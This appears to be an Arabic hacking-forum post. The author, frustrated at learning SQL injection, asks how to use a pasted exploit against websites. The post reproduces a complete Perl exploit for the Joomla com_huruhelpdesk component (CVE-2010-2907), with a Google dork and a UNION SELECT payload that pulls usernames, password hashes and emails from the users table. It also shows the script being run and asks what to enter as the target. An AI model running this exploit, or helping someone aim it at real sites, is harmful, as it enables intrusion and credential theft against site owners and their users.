سلام عليكم ورحمة الله وبركاتة ..
كيف الحال ان شاء الله بخير
وصلت لمرحلة اليأس
بصراحة بديت بتعلم حقن قواعد بيانات sql
وتعلمت عليها جيداً
لكن دائماً تجيني مشاكل بها ، وهي عدم وجود لوحه تحكم بعض المواقع أحياناً يجي اخطاء غريبة
لاعرف لها حل
مثل ، لايطلع الجدول المطلوب
والخ من المشاكل
قلت بشوف ثغرات سكربت جملا ، والورد بريس
بس للاسف ماعرفت لها ..
حاولت اترجم مافهمت كيف استغل
مثلا هاذي الثغرة
كود PHP:
#Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection #Google Dork: "inurl:option=com_huruhelpdesk"#Date: 04/10/2012#Exploit Author: D35m0nd142#Vendor Homepage: http://www.huruhelpdesk.net/#Tested on Joomla 1.5 #CVE: 2010-2907 #!/usr/bin/perlsystem("clear");print "***************************************\n";print " Joomla Component com_huruhelpdesk *\n";print " SQL Injection exploit *\n";print " Created by D35m0nd142 *\n";print "***************************************\n\n";use LWP::UserAgent;print "Target page [ex: http://www.site.com/dir] --> ";chomp(my $target=<STDIN> );$column_name="concat(username,0x3a,password,0x3a,mail)";$table_name="jos_users";$prm="-1/**/union/**/select/**/";$start= LWP::UserAgent->new() or die "[!] Error while processing";$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";$ok= $start->request(HTTP::Request->new(GET=>$website));$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){print "[+] Password found --> $1\n\n";sleep 1;}else{print "No password found :(\n";} # 1337day.com [2012-11-26]
الي فهمته منها ادخل على الدوس
واكتب
cd..
cd..
نتحول لقرص الـc
من ثم
cd perl
وننتقل لـperl
ومن ثم cd bin
ومن ثم اروح للي حفظته بمجلد bin
وكمثال سميته kk.pl
اكتب kk.pl
يجي هكذا
كود PHP:
C:\Perl\bin>ksa.pl
'clear' is not recognized as an internal or external command,
operable program or batch file.
***************************************
Joomla Component com_huruhelpdesk *
SQL Injection exploit *
Created by D35m0nd142 *
***************************************
Target page [ex: http://www.site.com/dir] -->
الآن ماذا افعل ،
طفشت بصراحة ولا مرة سويت شي صح
حتى الثغرات مافهم لها
,wgj glvpgm hgdHs